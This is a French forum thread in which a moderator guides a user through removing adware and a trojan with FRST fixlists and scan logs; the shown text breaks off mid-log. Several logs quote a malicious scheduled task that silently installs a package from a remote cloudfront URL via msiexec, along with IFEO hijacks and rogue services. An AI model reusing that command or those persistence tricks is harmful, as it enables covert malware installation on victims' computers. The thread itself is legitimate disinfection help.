Virus bien récalcitrant *.tmp.exe alias VT.AdWare.Elex

[Résolu/Fermé]
Signaler
Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017
-
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
-
Bonjour,

C’est la première fois que je suis obligé de vous faire une demande d’aide…

Ma copine m’a appelé à l’aide car des icônes étais apparus sur son bureau sans quelle installe de nouveaux jeux ce jour-là.

La plus par du temps je passe adwcleaner et RogueKiller et j’installe malwarebytes et cela sufi…

Et là Windows me retourne une interdiction de lancer adwcleaner et malwarebytes (qui étais déjà installer).

Après plusieurs passages en mode sans échec ou RogueKiller et adwcleaner veule bien passer j’ai constaté qu’ils persistaient deux virus VT.Adware.Elex et VT.Trojan.W64.Eroyee.aigu


Merci de votre aide


13 réponses

Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
Salut,

Le problème d'icône n'a probablement rien à voir avec des infections.

Pour vérifier :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
ha si infecté,

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\...\Run: [background_fault] => C:\Users\Rena Karena_2\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <===== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
S4 WinSAPSvc; C:\Users\Rena Karena_2\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-25] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION
S2 Niciwardterjek; C:\Program Files (x86)\Kesertherstemosy\bgseng.dll [X]
S4 BIT; C:\ProgramData\BIT\BIT.dll [1811968 2017-05-25] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION
S4 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [212994 ] () [Fichier non signé] <==== ATTENTION
2017-05-25 11:13 - 2017-05-25 11:13 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Firefox
2017-05-25 11:12 - 2017-05-25 11:12 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Firefox
2017-05-25 11:11 - 2017-05-25 11:11 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Hippig
2017-05-25 11:10 - 2017-05-25 11:10 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-25 11:09 - 2017-05-25 11:09 - 00000000 ____D C:\Program Files (x86)\Hippig
2017-05-25 11:08 - 2017-05-25 13:56 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\background_fault
2017-05-25 11:08 - 2017-05-25 11:11 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-25 11:07 - 2017-05-25 13:57 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-05-25 11:07 - 2017-05-25 11:36 - 00000023 _____ C:\Users\Public\Documents\temp.dat
2017-05-25 11:04 - 2017-05-25 11:07 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\snare
2017-05-25 11:04 - 2017-05-25 11:04 - 00003620 _____ C:\Windows\System32\Tasks\Milimili
2017-05-25 11:04 - 2017-05-25 11:04 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\WinSAPSvc
2017-05-25 11:04 - 2017-05-25 11:04 - 00000000 ____D C:\ProgramData\BIT
2017-05-23 00:14 - 2017-05-23 00:14 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-22 09:33 - 2017-05-22 09:33 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-22 09:30 - 2017-05-22 09:30 - 00000000 ____D C:\Program Files (x86)\qx551bb0
2017-05-21 15:01 - 2017-05-21 15:02 - 00000132 _____ C:\ProgramData\log.binb
2017-05-21 14:48 - 2017-05-25 11:46 - 00002966 _____ C:\Windows\System32\Tasks\{9416F41C-CF8B-4463-89AD-5C27EA9E8713}
2017-05-21 12:30 - 2017-05-21 14:07 - 00249618 _____ C:\Users\Rena Karena_2\AppData\Local\census.cache
2017-05-21 12:30 - 2017-05-21 13:30 - 00094527 _____ C:\Users\Rena Karena_2\AppData\Local\ars.cache
2017-05-21 12:02 - 2017-05-21 13:14 - 02405672 _____ (Trend Micro Inc.) C:\Users\Rena Karena_2\Downloads\HousecallLauncher64.exe
2017-05-21 12:02 - 2017-05-21 12:02 - 00000036 _____ C:\Users\Rena Karena_2\AppData\Local\housecall.guid.cache
2017-05-21 09:43 - 2017-05-21 09:46 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\navitool
2017-05-20 15:32 - 2017-05-20 15:39 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Showuk
2017-05-20 15:32 - 2017-05-20 15:32 - 00000000 ____D C:\Program Files (x86)\Arujogh Cloud
2017-05-20 15:31 - 2017-05-25 14:03 - 00016744 _____ C:\Windows\System32\Tasks\BMC Barcode Generator
2017-05-20 15:31 - 2017-05-20 15:31 - 00000000 ____D C:\Windows\system32\sstmp
2017-05-20 15:30 - 2017-05-25 11:02 - 00000000 ____D C:\Program Files (x86)\Solescoohut
2017-05-20 15:30 - 2017-05-21 15:01 - 00002526 _____ C:\ProgramData\log.ewbt
2017-05-20 15:30 - 2017-05-21 15:01 - 00000128 _____ C:\ProgramData\log.ewbb
2017-05-20 15:30 - 2017-05-21 09:36 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Starech
2017-05-20 15:30 - 2017-05-20 15:32 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Gerckfisosh
2017-05-20 15:30 - 2017-05-20 15:30 - 00005998 _____ C:\Windows\System32\Tasks\Womuck Monitor
2017-05-20 15:30 - 2017-05-20 15:30 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\CrashRpt
2017-05-20 15:30 - 2017-05-20 15:30 - 00000000 ____D C:\Program Files (x86)\Womuck Monitor
2017-05-20 15:09 - 2017-05-20 15:22 - 00000000 ____D C:\Users\Rena Karena_2\Documents\Anno 1404
2017-05-20 12:32 - 2017-05-25 11:46 - 00003322 _____ C:\Windows\System32\Tasks\{3A4F71C1-6523-4816-A029-1AC99C831258}
2017-05-19 20:19 - 2017-05-25 11:46 - 00003296 _____ C:\Windows\System32\Tasks\{F9D191B2-6123-4EA4-8332-B9106FAF89DA}
2017-05-19 19:12 - 2017-05-25 11:46 - 00003318 _____ C:\Windows\System32\Tasks\{878E4CFF-F016-49A8-9E93-BE64608CBF63}
2017-05-19 17:53 - 2017-05-19 17:57 - 00000000 ____D C:\Program Files\Sid Meiers Civilization Beyond Earth
2017-05-19 15:54 - 2017-05-19 15:54 - 00000000 ____D C:\Users\Rena Karena_2\AppData\LocalLow\Sushee
2017-05-19 15:36 - 2017-05-19 15:37 - 00000000 ____D C:\Users\Rena Karena_2\AppData\LocalLow\CampoSanto
2017-05-19 15:16 - 2017-05-19 15:16 - 00051623 _____ C:\Windows\uninstaller.dat
Task: {1EDF114B-F020-40E4-A36E-39AE8EA19EC4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-25] () <==== ATTENTION
ask: {95339A33-8CA2-4755-A69D-E9BED81F09EF} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HitachiXHDS721050CLA362_JPB570HC0UU3UH0UU3UHX&d=20170520 /q <==== ATTENTION
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
C:\Program Files (x86)\Hippig
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.


Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

voila le Fixlog :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par Rena Karena_2 (25-05-2017 14:31:18) Run:1
Exécuté depuis C:\Users\Rena Karena_2\Desktop
Profils chargés: Rena Karena_2 (Profils disponibles: Rena Karena_2)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\...\Run: [background_fault] => C:\Users\Rena Karena_2\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <===== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
S4 WinSAPSvc; C:\Users\Rena Karena_2\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-25] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION
S2 Niciwardterjek; C:\Program Files (x86)\Kesertherstemosy\bgseng.dll [X]
S4 BIT; C:\ProgramData\BIT\BIT.dll [1811968 2017-05-25] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION
S4 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [212994 ] () [Fichier non signé] <==== ATTENTION
2017-05-25 11:13 - 2017-05-25 11:13 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Firefox
2017-05-25 11:12 - 2017-05-25 11:12 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Firefox
2017-05-25 11:11 - 2017-05-25 11:11 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Hippig
2017-05-25 11:10 - 2017-05-25 11:10 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-25 11:09 - 2017-05-25 11:09 - 00000000 ____D C:\Program Files (x86)\Hippig
2017-05-25 11:08 - 2017-05-25 13:56 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\background_fault
2017-05-25 11:08 - 2017-05-25 11:11 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-25 11:07 - 2017-05-25 13:57 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-05-25 11:07 - 2017-05-25 11:36 - 00000023 _____ C:\Users\Public\Documents\temp.dat
2017-05-25 11:04 - 2017-05-25 11:07 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\snare
2017-05-25 11:04 - 2017-05-25 11:04 - 00003620 _____ C:\Windows\System32\Tasks\Milimili
2017-05-25 11:04 - 2017-05-25 11:04 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\WinSAPSvc
2017-05-25 11:04 - 2017-05-25 11:04 - 00000000 ____D C:\ProgramData\BIT
2017-05-23 00:14 - 2017-05-23 00:14 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-22 09:33 - 2017-05-22 09:33 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-22 09:30 - 2017-05-22 09:30 - 00000000 ____D C:\Program Files (x86)\qx551bb0
2017-05-21 15:01 - 2017-05-21 15:02 - 00000132 _____ C:\ProgramData\log.binb
2017-05-21 14:48 - 2017-05-25 11:46 - 00002966 _____ C:\Windows\System32\Tasks\{9416F41C-CF8B-4463-89AD-5C27EA9E8713}
2017-05-21 12:30 - 2017-05-21 14:07 - 00249618 _____ C:\Users\Rena Karena_2\AppData\Local\census.cache
2017-05-21 12:30 - 2017-05-21 13:30 - 00094527 _____ C:\Users\Rena Karena_2\AppData\Local\ars.cache
2017-05-21 12:02 - 2017-05-21 13:14 - 02405672 _____ (Trend Micro Inc.) C:\Users\Rena Karena_2\Downloads\HousecallLauncher64.exe
2017-05-21 12:02 - 2017-05-21 12:02 - 00000036 _____ C:\Users\Rena Karena_2\AppData\Local\housecall.guid.cache
2017-05-21 09:43 - 2017-05-21 09:46 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\navitool
2017-05-20 15:32 - 2017-05-20 15:39 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Showuk
2017-05-20 15:32 - 2017-05-20 15:32 - 00000000 ____D C:\Program Files (x86)\Arujogh Cloud
2017-05-20 15:31 - 2017-05-25 14:03 - 00016744 _____ C:\Windows\System32\Tasks\BMC Barcode Generator
2017-05-20 15:31 - 2017-05-20 15:31 - 00000000 ____D C:\Windows\system32\sstmp
2017-05-20 15:30 - 2017-05-25 11:02 - 00000000 ____D C:\Program Files (x86)\Solescoohut
2017-05-20 15:30 - 2017-05-21 15:01 - 00002526 _____ C:\ProgramData\log.ewbt
2017-05-20 15:30 - 2017-05-21 15:01 - 00000128 _____ C:\ProgramData\log.ewbb
2017-05-20 15:30 - 2017-05-21 09:36 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Roaming\Starech
2017-05-20 15:30 - 2017-05-20 15:32 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\Gerckfisosh
2017-05-20 15:30 - 2017-05-20 15:30 - 00005998 _____ C:\Windows\System32\Tasks\Womuck Monitor
2017-05-20 15:30 - 2017-05-20 15:30 - 00000000 ____D C:\Users\Rena Karena_2\AppData\Local\CrashRpt
2017-05-20 15:30 - 2017-05-20 15:30 - 00000000 ____D C:\Program Files (x86)\Womuck Monitor
2017-05-20 15:09 - 2017-05-20 15:22 - 00000000 ____D C:\Users\Rena Karena_2\Documents\Anno 1404
2017-05-20 12:32 - 2017-05-25 11:46 - 00003322 _____ C:\Windows\System32\Tasks\{3A4F71C1-6523-4816-A029-1AC99C831258}
2017-05-19 20:19 - 2017-05-25 11:46 - 00003296 _____ C:\Windows\System32\Tasks\{F9D191B2-6123-4EA4-8332-B9106FAF89DA}
2017-05-19 19:12 - 2017-05-25 11:46 - 00003318 _____ C:\Windows\System32\Tasks\{878E4CFF-F016-49A8-9E93-BE64608CBF63}
2017-05-19 17:53 - 2017-05-19 17:57 - 00000000 ____D C:\Program Files\Sid Meiers Civilization Beyond Earth
2017-05-19 15:54 - 2017-05-19 15:54 - 00000000 ____D C:\Users\Rena Karena_2\AppData\LocalLow\Sushee
2017-05-19 15:36 - 2017-05-19 15:37 - 00000000 ____D C:\Users\Rena Karena_2\AppData\LocalLow\CampoSanto
2017-05-19 15:16 - 2017-05-19 15:16 - 00051623 _____ C:\Windows\uninstaller.dat
Task: {1EDF114B-F020-40E4-A36E-39AE8EA19EC4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-25] () <==== ATTENTION
ask: {95339A33-8CA2-4755-A69D-E9BED81F09EF} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HitachiXHDS721050CLA362_JPB570HC0UU3UH0UU3UHX&d=20170520 /q <==== ATTENTION
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.)
C:\Program Files (x86)\Hippig
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => clé supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => clé supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WinSAPSvc => clé supprimé(es) avec succès
WinSAPSvc => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\Niciwardterjek => clé supprimé(es) avec succès
Niciwardterjek => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\BIT => clé supprimé(es) avec succès
BIT => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\DsSvc => clé supprimé(es) avec succès
DsSvc => service supprimé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\Firefox => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Firefox => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\Hippig => déplacé(es) avec succès
C:\Users\Public\Documents\Google => déplacé(es) avec succès
C:\Program Files (x86)\Hippig => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\background_fault => déplacé(es) avec succès
C:\Program Files (x86)\Firefox => déplacé(es) avec succès
C:\Users\Public\Documents\report.dat => déplacé(es) avec succès
C:\Users\Public\Documents\temp.dat => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\snare => déplacé(es) avec succès
C:\Windows\System32\Tasks\Milimili => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\WinSAPSvc => déplacé(es) avec succès
C:\ProgramData\BIT => déplacé(es) avec succès
C:\Windows\SysWOW64\1 => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\Program Files (x86)\qx551bb0 => déplacé(es) avec succès
C:\ProgramData\log.binb => déplacé(es) avec succès
C:\Windows\System32\Tasks\{9416F41C-CF8B-4463-89AD-5C27EA9E8713} => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\census.cache => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\ars.cache => déplacé(es) avec succès
C:\Users\Rena Karena_2\Downloads\HousecallLauncher64.exe => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\housecall.guid.cache => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\navitool => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Showuk => déplacé(es) avec succès
C:\Program Files (x86)\Arujogh Cloud => déplacé(es) avec succès
C:\Windows\System32\Tasks\BMC Barcode Generator => déplacé(es) avec succès
C:\Windows\system32\sstmp => déplacé(es) avec succès
C:\Program Files (x86)\Solescoohut => déplacé(es) avec succès
C:\ProgramData\log.ewbt => déplacé(es) avec succès
C:\ProgramData\log.ewbb => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Starech => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\Gerckfisosh => déplacé(es) avec succès
C:\Windows\System32\Tasks\Womuck Monitor => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Local\CrashRpt => déplacé(es) avec succès
C:\Program Files (x86)\Womuck Monitor => déplacé(es) avec succès
C:\Users\Rena Karena_2\Documents\Anno 1404 => déplacé(es) avec succès
C:\Windows\System32\Tasks\{3A4F71C1-6523-4816-A029-1AC99C831258} => déplacé(es) avec succès
C:\Windows\System32\Tasks\{F9D191B2-6123-4EA4-8332-B9106FAF89DA} => déplacé(es) avec succès
C:\Windows\System32\Tasks\{878E4CFF-F016-49A8-9E93-BE64608CBF63} => déplacé(es) avec succès
C:\Program Files\Sid Meiers Civilization Beyond Earth => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\LocalLow\Sushee => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\LocalLow\CampoSanto => déplacé(es) avec succès
C:\Windows\uninstaller.dat => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EDF114B-F020-40E4-A36E-39AE8EA19EC4} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EDF114B-F020-40E4-A36E-39AE8EA19EC4} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Milimili => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => clé supprimé(es) avec succès
ask: {95339A33-8CA2-4755-A69D-E9BED81F09EF} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HitachiXHDS721050CLA362_JPB570HC0UU3UH0UU3UHX&d=20170520 /q <==== ATTENTION => Erreur: Pas de correction automatique trouvée pour cet élément.
C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Rena Karena_2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Public\Desktop\Google Chrome.lnk => déplacé(es) avec succès
"C:\Program Files (x86)\Hippig" => non trouvé(e).
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11540885 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 22227246 B
Edge => 0 B
Chrome => 12246711 B
Firefox => 12199009 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 33125 B
Public => 0 B
ProgramData => 0 B
systemprofile32 => 119868 B
LocalService => 66228 B
NetworkService => 77846 B
Rena Karena_2 => 12508743 B

RecycleBin => 22842 B
EmptyTemp: => 67.8 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 14:32:50

je fait les autre étape des que j'ai remis la carte réseau en état le pilote ne démarre plus

merci

Bel_Iblis
Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

les deux virus pres siter sont parti

mais je ne peux toujours pas executer Malwairebit


voici les nouveaux rapore de FRST :

https://pjjoint.malekal.com/files.php?id=FRST_20170525_h13y10i11g14v8

https://pjjoint.malekal.com/files.php?id=20170525_l8y12u5r10x5

https://pjjoint.malekal.com/files.php?id=20170525_c15b12d9c10r10

encore merci du coup de main
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
Oui c'est mieux :)

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {95339A33-8CA2-4755-A69D-E9BED81F09EF} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HitachiXHDS721050CLA362_JPB570HC0UU3UH0UU3UHX&d=20170520 /q <==== ATTENTION
Task: {0CF3D7FA-6188-4B78-8C1B-A6FF83A125A1} - \{3A4F71C1-6523-4816-A029-1AC99C831258} -> Pas de fichier <==== ATTENTION
c:\Program Files\Microsoft Security Client
Task: {A67423B1-427F-4FF2-AA60-F8096B21AE4A} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {A9EC5320-235C-411A-A8AF-36840860F002} - \{F9D191B2-6123-4EA4-8332-B9106FAF89DA} -> Pas de fichier <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

voici le fixlog :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par Rena Karena_2 (26-05-2017 12:58:46) Run:2
Exécuté depuis C:\Users\Rena Karena_2\Desktop
Profils chargés: Rena Karena_2 (Profils disponibles: Rena Karena_2)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
Task: {95339A33-8CA2-4755-A69D-E9BED81F09EF} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HitachiXHDS721050CLA362_JPB570HC0UU3UH0UU3UHX&d=20170520 /q <==== ATTENTION
